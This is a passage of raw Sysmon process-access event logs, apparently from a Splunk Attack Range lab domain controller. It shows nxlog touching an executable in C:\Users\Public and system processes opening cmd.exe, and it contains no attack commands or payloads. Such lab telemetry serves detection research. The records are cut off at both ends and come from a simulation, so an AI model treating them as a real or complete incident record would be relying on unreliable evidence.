(x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2755,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:57.148\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:57.148","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2756,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:58.152\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:58.152","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2757,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:59.156\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:59.156","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2758,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2759,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2760,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-0010C0DF0400}\r\nTargetProcessId: 2436\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-0010C0DF0400}","TargetProcessId":"2436","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2761,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-0010C0DF0400}\r\nTargetProcessId: 2436\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-0010C0DF0400}","TargetProcessId":"2436","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2762,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 